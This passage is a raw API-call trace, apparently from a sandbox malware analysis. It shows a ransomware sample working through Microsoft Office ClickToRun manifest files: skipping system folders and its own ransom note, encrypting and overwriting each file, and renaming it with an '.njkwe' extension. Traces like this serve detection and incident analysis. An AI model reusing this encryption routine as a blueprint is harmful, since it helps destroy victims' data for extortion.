(lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0072.437] lstrcmpiW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0072.437] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned 129 [0072.437] StrStrIW (lpFirst="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0072.437] lstrcmpW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.437] lstrcmpW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0072.437] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.438] GetTickCount () returned 0x1152789 [0072.438] GetTickCount () returned 0x1152789 [0072.438] GetTickCount () returned 0x1152789 [0072.438] GetTickCount () returned 0x1152789 [0072.438] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.438] GetProcessHeap () returned 0xbe0000 [0072.438] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.438] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.440] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.440] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.440] GetProcessHeap () returned 0xbe0000 [0072.440] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.440] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.440] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.494] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.494] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.494] CloseHandle (hObject=0x434) returned 1 [0072.494] GetProcessHeap () returned 0xbe0000 [0072.494] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.494] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 149 [0072.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.495] GetProcessHeap () returned 0xbe0000 [0072.495] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.495] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a705a3, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a705a3, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x11cbd0e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2aafe, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", cAlternateFileName="C2668D~1.XML")) returned 1 [0072.495] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0072.495] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0072.495] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0072.495] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0072.495] lstrcmpiW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0072.495] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml") returned 127 [0072.495] StrStrIW (lpFirst="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0072.495] lstrcmpW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.495] lstrcmpW (lpString1="C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0072.495] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-no", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.495] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.496] GetTickCount () returned 0x11527c8 [0072.496] GetTickCount () returned 0x11527c8 [0072.496] GetTickCount () returned 0x11527c8 [0072.496] GetTickCount () returned 0x11527c8 [0072.496] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.496] GetProcessHeap () returned 0xbe0000 [0072.496] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.496] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.498] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.498] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.498] GetProcessHeap () returned 0xbe0000 [0072.498] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.498] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.498] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.500] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.500] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.500] CloseHandle (hObject=0x434) returned 1 [0072.500] GetProcessHeap () returned 0xbe0000 [0072.500] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.500] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 147 [0072.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.501] GetProcessHeap () returned 0xbe0000 [0072.501] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.501] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a4a3b4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a4a3b4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1218203, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf0cb4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.visiomui.msi.16.en-us.xml", cAlternateFileName="C2A712~1.XML")) returned 1 [0072.501] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0072.501] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0072.501] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0072.501] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0072.501] lstrcmpiW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0072.501] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml") returned 116 [0072.501] StrStrIW (lpFirst="C2RManifest.visiomui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0072.501] lstrcmpW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.501] lstrcmpW (lpString1="C2RManifest.visiomui.msi.16.en-us.xml", lpString2="taridd") returned -1 [0072.501] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.501] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.502] GetTickCount () returned 0x11527c8 [0072.502] GetTickCount () returned 0x11527c8 [0072.502] GetTickCount () returned 0x11527c8 [0072.502] GetTickCount () returned 0x11527c8 [0072.502] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.502] GetProcessHeap () returned 0xbe0000 [0072.502] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.502] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.504] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.504] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.504] GetProcessHeap () returned 0xbe0000 [0072.504] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.504] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.504] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.506] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.506] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.506] CloseHandle (hObject=0x434) returned 1 [0072.506] GetProcessHeap () returned 0xbe0000 [0072.506] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.506] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe") returned 136 [0072.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.507] GetProcessHeap () returned 0xbe0000 [0072.507] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.507] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf5ca1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecf5ca1c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2dd401b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1536e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~2.XML")) returned 1 [0072.507] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="Windows") returned -1 [0072.507] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="$Recycle.bin") returned 1 [0072.507] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="System Volume Information") returned -1 [0072.507] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="Program Files") returned -1 [0072.507] lstrcmpiW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="Program Files (x86)") returned -1 [0072.507] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned 125 [0072.507] StrStrIW (lpFirst="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpSrch=".njkwe") returned 0x0 [0072.507] lstrcmpW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.507] lstrcmpW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="taridd") returned -1 [0072.507] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.507] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.507] GetTickCount () returned 0x11527c8 [0072.507] GetTickCount () returned 0x11527c8 [0072.507] GetTickCount () returned 0x11527c8 [0072.507] GetTickCount () returned 0x11527c8 [0072.507] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.508] GetProcessHeap () returned 0xbe0000 [0072.508] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.508] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.509] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.509] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0072.510] GetProcessHeap () returned 0xbe0000 [0072.510] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.510] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.510] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.510] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.510] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.510] CloseHandle (hObject=0x434) returned 1 [0072.511] GetProcessHeap () returned 0xbe0000 [0072.511] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.511] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe") returned 145 [0072.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml_r00t_{3sxle5}.njkwe")) returned 1 [0072.512] GetProcessHeap () returned 0xbe0000 [0072.512] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.512] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf3682d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xecf3682d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd3a7e818, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x130fe, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="C2RManifest.wordmui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~1.XML")) returned 1 [0072.512] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="Windows") returned -1 [0072.512] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="$Recycle.bin") returned 1 [0072.512] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="System Volume Information") returned -1 [0072.512] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="Program Files") returned -1 [0072.512] lstrcmpiW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="Program Files (x86)") returned -1 [0072.512] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned 115 [0072.512] StrStrIW (lpFirst="C2RManifest.wordmui.msi.16.en-us.xml", lpSrch=".njkwe") returned 0x0 [0072.512] lstrcmpW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 